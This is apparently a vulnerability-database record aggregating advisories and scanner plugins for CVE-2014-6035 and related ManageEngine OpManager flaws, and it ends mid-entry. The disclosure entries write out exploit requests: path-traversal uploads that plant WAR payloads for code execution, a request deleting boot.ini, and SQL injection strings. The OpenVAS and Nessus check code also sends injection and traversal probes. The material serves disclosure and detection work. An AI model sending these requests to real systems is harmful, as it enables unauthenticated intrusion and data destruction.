ID CVE-2014-6035 Type cve Reporter NVD Modified 2014-12-05T08:33:00
Description
Directory traversal vulnerability in the FileCollector servlet in ZOHO ManageEngine OpManager 11.4, 11.3, and earlier allows remote attackers to write and execute arbitrary files via a .. (dot dot) in the FILENAME parameter.
{"reporter": "NVD", "enchantments": {"score": {"vector": "NONE", "value": 7.5}, "vulnersScore": 7.5}, "published": "2014-12-04T12:59:03", "cvelist": ["CVE-2014-6035"], "title": "CVE-2014-6035", "objectVersion": "1.2", "type": "cve", "hash": "a0619835cbdedbf8c4acd217a1f33dfb08970b5baa54117656c087b3ccce512d", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6035", "bulletinFamily": "NVD", "id": "CVE-2014-6035", "history": [], "scanner": [], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "modified": "2014-12-05T08:33:00", "viewCount": 0, "cpe": ["cpe:/a:zohocorp:manageengine_opmanager:11.3", "cpe:/a:zohocorp:manageengine_opmanager:11.4"], "edition": 1, "description": "Directory traversal vulnerability in the FileCollector servlet in ZOHO ManageEngine OpManager 11.4, 11.3, and earlier allows remote attackers to write and execute arbitrary files via a .. (dot dot) in the FILENAME parameter.", "references": ["http://seclists.org/fulldisclosure/2014/Sep/110", "https://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix", "https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt"], "lastseen": "2016-09-03T20:59:36", "assessment": {"system": "", "name": "", "href": ""}}
{"result": {"zdi": [{"lastseen": "2016-11-09T00:17:58", "references": ["https://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix"], "edition": 2, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of ManageEngine OpManager. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the AgentDataHandler class. The issue lies in the failure to sanitize the filenames uploaded to the servlet. An attacker can leverage this vulnerability to execute code under the context of SYSTEM.", "reporter": "Andrea Micalizzi (rgod)", "published": "2015-04-15T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "ManageEngine OpManager AgentDataHandler FILENAME File Upload Remote Code Execution Vulnerability", "type": "zdi", "bulletinFamily": "info", "cvelist": ["CVE-2014-6035"], "modified": "2015-11-09T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-15-142", "id": "ZDI-15-142", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "dsquare": [{"lastseen": "2017-09-26T15:33:26", "_object_types": ["robots.models.base.Bulletin", "robots.models.dsquare.DsquareBulletin"], "enchantments_done": [], "references": ["https://vulners.com/OSVDB/OSVDB:112277"], "description": "File upload vulnerability in ManageEngine OpManager FileCollector servlet FILENAME parameter\n\nVulnerability Type: File Upload", "reporter": "Dsquare Security", "published": "2014-11-30T00:00:00", "title": "ManageEngine OpManager FileCollector Servlet File Upload", "type": "dsquare", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6035"], "_object_type": "robots.models.dsquare.DsquareBulletin", "modified": "2014-11-30T00:00:00", "href": "", "id": "E-407", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:23:53", "references": [], "edition": 1, "description": "", "reporter": "Pedro Ribeiro", "published": "2014-09-29T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "packetstorm", "title": "ManageEngine Code Execution / File Deletion", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6035", "CVE-2014-6034", "CVE-2014-6036"], "modified": "2014-09-29T00:00:00", "href": "https://packetstormsecurity.com/files/128474/ManageEngine-Code-Execution-File-Deletion.html", "id": "PACKETSTORM:128474", "sourceData": "`Hi, \n \nThis is the fifth part of the ManageOwnage series. For previous parts, see: \nhttp://seclists.org/fulldisclosure/2014/Aug/55 \nhttp://seclists.org/fulldisclosure/2014/Aug/75 \nhttp://seclists.org/fulldisclosure/2014/Aug/88 \nhttp://seclists.org/fulldisclosure/2014/Sep/1 \n \nThis time we have a file upload with directory traversal as well as an \narbitrary file deletion vulnerability. The file upload can be abused \nto deliver a WAR payload in the Tomcat webapps directory, which will \ndeploy a malicious Servlet allowing the attacker to execute arbitrary \ncode. \n \nDetails are below, and the usual Metasploit module has been submitted \nand should be available soon (see pull request \nhttps://github.com/rapid7/metasploit-framework/pull/3903). \n \n \n>> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360 \n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security \n========================================================================== \n \n>> Background on the affected products: \n\"ManageEngine OpManager is a network and data center infrastructure \nmanagement software that helps large enterprises, service providers \nand SMEs manage their data centers and IT infrastructure efficiently \nand cost effectively. Automated workflows, intelligent alerting \nengines, configurable discovery rules, and extendable templates enable \nIT teams to setup a 24x7 monitoring system within hours of \ninstallation.\" \n \n\"Social IT Plus offers a cascading wall that helps IT folks to start \ndiscussions, share articles and videos easily and quickly. Other team \nmembers can access it and post comments and likes on the fly.\" \n \n\"Managing mission critical business applications is now made easy \nthrough ManageEngine IT360. With agentless monitoring methodology, \nmonitor your applications, servers and databases with ease. Agentless \nmonitoring of your business applications enables you high ROI and low \nTOC. With integrated network monitoring and bandwidth utilization, \nquickly troubleshoot any performance related issue with your network \nand assign issues automatically with ITIL based ServiceDesk \nintegration.\" \n \n \n>> Technical details: \n#1 \nVulnerability: Remote code execution via WAR file upload \nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360 \n \na) \nCVE-2014-6034 \nPOST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=payload.war \nAffected versions: OpManager v8.8 to v11.3; Social IT Plus v11.0; \nIT360 v? to v10.4 \nA Metasploit module that exploits this vulnerability has been released. \n \nb) \nCVE-2014-6035 \nPOST /servlets/FileCollector?AGENTKEY=123&FILENAME=../../../tomcat/webapps/warfile.war \nAffected versions: OpManager v? to v11.3 \n \n \n#2 \nVulnerability: Arbitrary file deletion \nCVE-2014-6036 \nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360 \nAffected versions: OpManager v? to v11.3; Social IT Plus v11.0; IT360 \nv? to v10.4 \n \nPOST /servlets/multipartRequest?customIcon=delete&fileName=../../../../boot.ini \n \n \n>> Fix: \nUpgrade to OpManager 11.3, then install the patch in \nhttps://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix \nThis patch can be applied to all the applications but only for the \nlatest version of each (OpManager 11.3, Social IT 11.0, IT360 10.4). \nManageEngine have indicated that the soon to be released OpManager \nversion 11.4 might not have the fix as the release is almost ready. \nThey are planning to include the fix in OpManager version 11.5 which \nshould be released sometime in late November or December 2014. No \nindication was given for when fixed versions of IT360 and Social IT \nPlus will be released. \n \nA copy of the advisory above can be found at my repo: \nhttps://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt \n \nRegards, \nPedro \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/128474/meopmanager-execlfi.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2018-02-15T16:58:50", "references": ["http://www.exploit-db.com/exploits/35209", "https://support.zoho.com/portal/manageengine/helpcenter/articles/fix-for-remote-code-execution-via-file-upload-vulnerability", "https://support.zoho.com/portal/manageengine/helpcenter/articles/sql-injection-vulnerability-fix"], "pluginID": "1361412562310805103", "description": "This host is installed with ManageEngine\n OpManager and is prone to multiple vulnerabilities.", "edition": 3, "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-11-24T00:00:00", "title": "ManageEngine OpManager Multiple Vulnerabilities Nov14", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-6035", "CVE-2014-7866", "CVE-2014-7868"], "modified": "2018-02-15T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805103", "id": "OPENVAS:1361412562310805103", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_manageengine_opmanager_mult_vuln.nasl 8820 2018-02-15 05:56:30Z ckuersteiner $\n#\n# ManageEngine OpManager Multiple Vulnerabilities Nov14\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:zohocorp:manageengine_opmanager\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805103\");\n script_version(\"$Revision: 8820 $\");\n script_cve_id(\"CVE-2014-7866\", \"CVE-2014-7868\", \"CVE-2014-6035\");\n script_bugtraq_id(71001, 71002);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-02-15 06:56:30 +0100 (Thu, 15 Feb 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-11-24 16:16:10 +0530 (Mon, 24 Nov 2014)\");\n script_name(\"ManageEngine OpManager Multiple Vulnerabilities Nov14\");\n\n script_tag(name:\"summary\", value:\"This host is installed with ManageEngine\n OpManager and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted request via HTTP GET and\n check whether it is able to execute sql query or not.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n- /servlet/MigrateLEEData script not properly sanitizing user input, specifically path traversal style attacks\n(e.g. '../') supplied via the 'fileName' parameter.\n\n- /servlet/MigrateCentralData script not properly sanitizing user input, specifically path traversal style attacks\n(e.g. '../') supplied via the 'zipFileName' parameter.\n\n- /servlet/APMBVHandler script not properly sanitizing user-supplied input to the 'OPM_BVNAME' POST parameter.\n\n- /servlet/DataComparisonServlet script not properly sanitizing user-supplied input to the 'query' POST\nparameter.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to upload arbitrary files and\nexecute the script within the file with the privileges of the web server, manipulate SQL queries in the backend\ndatabase, and disclose certain sensitive information.\n\nImpact Level: Application\");\n\n script_tag(name:\"affected\", value:\"ManageEngine OpManager version 11.3/11.4\");\n\n script_tag(name:\"solution\", value:\"Apply the patch from the given link,\nhttps://support.zoho.com/portal/manageengine/helpcenter/articles/sql-injection-vulnerability-fix,\nhttps://support.zoho.com/portal/manageengine/helpcenter/articles/fix-for-remote-code-execution-via-file-upload-vulnerability\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n\n script_xref(name: \"URL\", value: \"http://www.exploit-db.com/exploits/35209\");\n script_xref(name: \"URL\", value: \"https://support.zoho.com/portal/manageengine/helpcenter/articles/sql-injection-vulnerability-fix\");\n script_xref(name: \"URL\", value: \"https://support.zoho.com/portal/manageengine/helpcenter/articles/fix-for-remote-code-execution-via-file-upload-vulnerability\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_manage_engine_opmanager_detect.nasl\");\n script_mandatory_keys(\"OpManager/installed\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\ndata = \"OPERATION_TYPE=Delete&OPM_BVNAME=aaa'; SELECT PG_SLEEP(1)--\";\nurl = \"/servlet/APMBVHandler\";\n\nreq = http_post_req(port: port, url: url, data: data,\n add_headers: make_array(\"Content-Type\", \"application/x-www-form-urlencoded\"));\nres = http_keepalive_send_recv(port: port, data: req);\n\nif (\"Action=BV_DELETED\" >< res && \"SELECT PG_SLEEP(1)--\" >< res && \"Result=Success\" >< res &&\n \"Result=Failure\" >!< res) {\n security_message(port: port);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2018-06-15T13:41:46", "references": ["http://www.nessus.org/u?6b48dd0a", "http://seclists.org/fulldisclosure/2014/Sep/110"], "pluginID": "81378", "description": "The version of ManageEngine OpManager installed on the remote host is affected by multiple directory traversal vulnerabilities :\n\n - The FileCollector servlet fails to properly sanitize user-supplied input to the 'regionID' and 'FILENAME' parameters when uploading files. This allows a remote attacker and authenticated users to write to and execute arbitrary WAR files.\n (CVE-2014-6034, CVE-2014-6035)\n\n - The multipartRequest servlet fails to properly sanitize user-supplied input to the 'fileName' parameter. This allows a remote attacker and authenticated users to delete arbitrary files. (CVE-2014-6036)\n\nNote that Nessus has tested for the two directory traversal and file upload vulnerabilities; however, it did not test for the arbitrary code execution or file deletion vulnerabilities. If a file can be uploaded via the directory traversal attack, then the execution and deletion flaws are likely exploitable as well.", "edition": 5, "reporter": "Tenable", "published": "2015-02-16T00:00:00", "title": "ManageEngine OpManager Multiple Directory Traversal Vulnerabilities", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "naslFamily": "CGI abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-6035", "CVE-2014-6034", "CVE-2014-6036"], "modified": "2018-06-14T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_opmanager"], "id": "MANAGEENGINE_OPMANAGER_11300_FILE_UPLOAD_EXPLOIT.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=81378", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81378);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/06/14 12:21:47\");\n\n script_cve_id(\"CVE-2014-6034\", \"CVE-2014-6035\", \"CVE-2014-6036\");\n script_bugtraq_id(70167, 70169, 70172);\n\n script_name(english:\"ManageEngine OpManager Multiple Directory Traversal Vulnerabilities\");\n script_summary(english:\"Attempts to upload a file.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a Java web application that is affected\nby multiple directory traversal vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of ManageEngine OpManager installed on the remote host is\naffected by multiple directory traversal vulnerabilities :\n\n - The FileCollector servlet fails to properly sanitize\n user-supplied input to the 'regionID' and 'FILENAME'\n parameters when uploading files. This allows a remote\n attacker and authenticated users to write to and\n execute arbitrary WAR files.\n (CVE-2014-6034, CVE-2014-6035)\n\n - The multipartRequest servlet fails to properly sanitize\n user-supplied input to the 'fileName' parameter. This\n allows a remote attacker and authenticated users to\n delete arbitrary files. (CVE-2014-6036)\n\nNote that Nessus has tested for the two directory traversal and file\nupload vulnerabilities; however, it did not test for the arbitrary\ncode execution or file deletion vulnerabilities. If a file can be\nuploaded via the directory traversal attack, then the execution and\ndeletion flaws are likely exploitable as well.\");\n # https://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6b48dd0a\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/fulldisclosure/2014/Sep/110\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ManageEngine OpManager version 11.3 and apply the\nvendor-supplied patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"ManageEngine OpManager FileCollector Servlet File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ManageEngine OpManager and Social IT Arbitrary File Upload');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zohocorp:manageengine_opmanager\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"manageengine_opmanager_detect.nbin\");\n script_require_keys(\"installed_sw/ManageEngine OpManager\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"ManageEngine OpManager\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\ndir = install[\"path\"];\ninstall_url = build_url(port:port, qs:dir);\nunique = rand_str(length:10);\nfile = \"nessus_delete_this_file_\" + unique + \".css\";\n\n# Try to upload a CSS file\n# While we don't try to upload a WAR file directly, if we can\n# upload a CSS file we could use the same request to upload a WAR\n# file which would allow for remote code execution\npostdata = 'Nessus Check: '+unique;\n\n# Couple of vectors to test\nvectors = make_list(\n \"servlets/FileCollector?AGENTKEY=123&FILENAME=../../../webclient/common/css/\"+file,\n \"servlets/FileCollector?AGENTKEY=123&FILENAME=..\\\\..\\\\..\\\\webclient\\\\common\\\\css\\\\\"+file,\n \"servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../webclient/common/css&FILENAME=\"+file,\n \"servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=..\\\\..\\\\..\\\\webclient\\\\common\\\\css&FILENAME=\"+file\n);\n\nuploaded = FALSE;\nexecuted = FALSE;\nvecurl = \"\";\nforeach vector (vectors)\n{\n\n res = http_send_recv3(\n port : port,\n method : \"POST\",\n item : dir+vector,\n data : postdata,\n content_type : \"text/html\",\n exit_on_fail : TRUE\n );\n exp_request = http_last_sent_request();\n\n # Try and access our uploaded file\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : dir + \"webclient/common/css/\" +file,\n exit_on_fail : TRUE\n );\n\n # Only need to upload one file\n if(\"Nessus Check: \"+unique >< res[2])\n {\n uploaded = TRUE;\n vecurl = vector;\n break;\n }\n}\n\nif (uploaded)\n{\n security_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n file : dir+\"webclient/common/css/\"+file,\n line_limit : 10,\n request : make_list(exp_request),\n output : chomp(res[2]),\n attach_type : 'text/plain'\n );\n} else audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zdt": [{"lastseen": "2018-03-14T14:37:35", "references": [], "description": "Exploit for multiple platform in category web applications", "edition": 1, "reporter": "Pedro Ribeiro", "published": "2018-01-26T00:00:00", "title": "ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities", "type": "zdt", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6035", "CVE-2014-6034", "CVE-2014-7866", "CVE-2014-7868", "CVE-2014-6036"], "modified": "2018-01-26T00:00:00", "href": "https://0day.today/exploit/description/29642", "id": "1337DAY-ID-29642", "sourceData": ">> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360\r\n>> Discovered by Pedro Ribeiro ([email\u00a0protected]), Agile Information Security\r\n==========================================================================\r\nDisclosure: 27/09/2014 (#1 and #2), 09/11/2014 (#3 and #4) / Last updated: 09/11/2014\r\n \r\n>> Background on the affected products:\r\n\"ManageEngine OpManager is a network and data center infrastructure management software that helps large enterprises, service providers and SMEs manage their data centers and IT infrastructure efficiently and cost effectively. Automated workflows, intelligent alerting engines, configurable discovery rules, and extendable templates enable IT teams to setup a 24x7 monitoring system within hours of installation.\"\r\n \r\n\"Social IT Plus offers a cascading wall that helps IT folks to start discussions, share articles and videos easily and quickly. Other team members can access it and post comments and likes on the fly.\"\r\n \r\n\"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration.\"\r\n \r\n \r\n>> Technical details:\r\n#1\r\nVulnerability: Remote code execution via WAR file upload\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n \r\na)\r\nCVE-2014-6034\r\nPOST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=payload.war\r\n<... WAR file payload ...>\r\nAffected versions: OpManager v8.8 to v11.4; Social IT Plus v11.0; IT360 v? to v10.4\r\nA Metasploit module that exploits this vulnerability has been released.\r\n \r\nb)\r\nCVE-2014-6035\r\nPOST /servlets/FileCollector?AGENTKEY=123&FILENAME=../../../tomcat/webapps/warfile.war\r\n<... WAR file payload ...>\r\n \r\nAffected versions: OpManager v? to v11.4\r\n \r\n \r\n#2\r\nVulnerability: Arbitrary file deletion\r\nCVE-2014-6036\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\nAffected versions: OpManager v? to v11.4; Social IT Plus v11.0; IT360 v? to v10.3/10.4\r\n \r\nPOST /servlets/multipartRequest?customIcon=delete&fileName=../../../../boot.ini\r\n \r\n \r\n#3\r\nVulnerability: Remote code execution via file upload\r\nCVE-2014-7866\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n \r\na)\r\nPOST /servlet/MigrateLEEData?fileName=../tomcat/webapps/warfile.war%00\r\n<... WAR file payload ...>\r\n \r\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4; IT360 10.3/10.4; Social IT 11.0\r\n \r\nb)\r\nPOST /servlet/MigrateCentralData?operation=downloadFileFromProbe&zipFileName=../tomcat/webapps/warfile.war%00\r\n<... WAR file payload ...>\r\n \r\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4; IT360 10.3/10.4; Social IT 11.0\r\n \r\n \r\n#4\r\nVulnerability: Blind SQL injection\r\nCVE-2014-7868\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n \r\na)\r\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=[SQLi]\r\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=aaa'%3bcreate+table+pulicia+(bolas+text)%3b--+\r\nAffected versions: Unknown, at least the current versions (OpManager 11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\r\n \r\nb)\r\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=[SQLi] --> runs direct query in db!\r\nPOST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=create+table+panicia+(bolos+text)\r\nAffected versions: Unknown, at least the current versions (OpManager 11.3/11.4; IT360 10.3/10.4; Social IT 11.0)\r\n \r\n \r\n>> Fix:\r\nUpgrade to OpManager 11.3 or 11.4, then install patches [A], [B] and [C].\r\nThis patch can be applied to all the applications but only for the latest version of each (OpManager 11.3/11.4, Social IT 11.0, IT360 10.4).\r\nThe fix will be included in OpManager version 11.5 which should be released sometime in late November or December 2014. No indication was given for when fixed versions of IT360 and Social IT Plus will be released.\r\n \r\n[A] https://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix\r\nResolves #1 and #2\r\n \r\n[B] https://support.zoho.com/portal/manageengine/helpcenter/articles/sql-injection-vulnerability-fix\r\nResolves #3\r\n \r\n[C] https://support.zoho.com/portal/manageengine/helpcenter/articles/fix-for-remote-code-execution-via-file-upload-vulnerability\r\nResolves #4\r\n \r\n================\r\nAgile Information Security Limited\r\nhttp://www.agileinfosec.co.uk/\r\n>> Enabling secure digital business >>\n\n# 0day.today [2018-03-14] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/29642"}], "exploitdb": [{"lastseen": "2018-01-25T18:52:52", "osvdbidlist": [], "references": [], "description": "ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities. CVE-2014-6034,CVE-2014-6035,CVE-2014-6036,CVE-2014-7866,CVE-2014-7868. Webapps ex...", "edition": 1, "reporter": "Exploit-DB", "published": "2014-11-09T00:00:00", "type": "exploitdb", "title": "ManageEngine OpManager / Social IT Plus / IT360 - Multiple Vulnerabilities", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6035", "CVE-2014-6034", "CVE-2014-7866", "CVE-2014-7868", "CVE-2014-6036"], "modified": "2014-11-09T00:00:00", "href": "https://www.exploit-db.com/exploits/43896/", "id": "EDB-ID:43896", "sourceData": ">> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360\r\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\r\n==========================================================================\r\nDisclosure: 27/09/2014 (#1 and #2), 09/11/2014 (#3 and #4) / Last updated: 09/11/2014\r\n\r\n>> Background on the affected products:\r\n\"ManageEngine OpManager is a network and data center infrastructure management software that helps large enterprises, service providers and SMEs manage their data centers and IT infrastructure efficiently and cost effectively. Automated workflows, intelligent alerting engines, configurable discovery rules, and extendable templates enable IT teams to setup a 24x7 monitoring system within hours of installation.\"\r\n\r\n\"Social IT Plus offers a cascading wall that helps IT folks to start discussions, share articles and videos easily and quickly. Other team members can access it and post comments and likes on the fly.\"\r\n\r\n\"Managing mission critical business applications is now made easy through ManageEngine IT360. With agentless monitoring methodology, monitor your applications, servers and databases with ease. Agentless monitoring of your business applications enables you high ROI and low TOC. With integrated network monitoring and bandwidth utilization, quickly troubleshoot any performance related issue with your network and assign issues automatically with ITIL based ServiceDesk integration.\"\r\n\r\n\r\n>> Technical details:\r\n#1\r\nVulnerability: Remote code execution via WAR file upload\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n\r\na)\r\nCVE-2014-6034\r\nPOST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=payload.war\r\n<... WAR file payload ...>\r\nAffected versions: OpManager v8.8 to v11.4; Social IT Plus v11.0; IT360 v? to v10.4\r\nA Metasploit module that exploits this vulnerability has been released.\r\n\r\nb)\r\nCVE-2014-6035\r\nPOST /servlets/FileCollector?AGENTKEY=123&FILENAME=../../../tomcat/webapps/warfile.war\r\n<... WAR file payload ...>\r\n\r\nAffected versions: OpManager v? to v11.4\r\n\r\n\r\n#2\r\nVulnerability: Arbitrary file deletion\r\nCVE-2014-6036\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\nAffected versions: OpManager v? to v11.4; Social IT Plus v11.0; IT360 v? to v10.3/10.4\r\n\r\nPOST /servlets/multipartRequest?customIcon=delete&fileName=../../../../boot.ini\r\n\r\n\r\n#3\r\nVulnerability: Remote code execution via file upload\r\nCVE-2014-7866\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n\r\na)\r\nPOST /servlet/MigrateLEEData?fileName=../tomcat/webapps/warfile.war%00\r\n<... WAR file payload ...>\r\n\r\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4; IT360 10.3/10.4; Social IT 11.0\r\n\r\nb)\r\nPOST /servlet/MigrateCentralData?operation=downloadFileFromProbe&zipFileName=../tomcat/webapps/warfile.war%00\r\n<... WAR file payload ...>\r\n\r\nAffected versions: Unknown, at least OpManager v8 build 88XX to 11.4; IT360 10.3/10.4; Social IT 11.0\r\n\r\n\r\n#4\r\nVulnerability: Blind SQL injection\r\nCVE-2014-7868\r\nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360\r\n\r\na)\r\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=[SQLi]\r\nPOST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=aaa'%3bcreate+table+pulicia+(bolas+text)%3b--+\r\nAffected versions: Unknown, at least the current versions (OpManager 11.3/11.4; IT360 10.3/10.4; Social IT 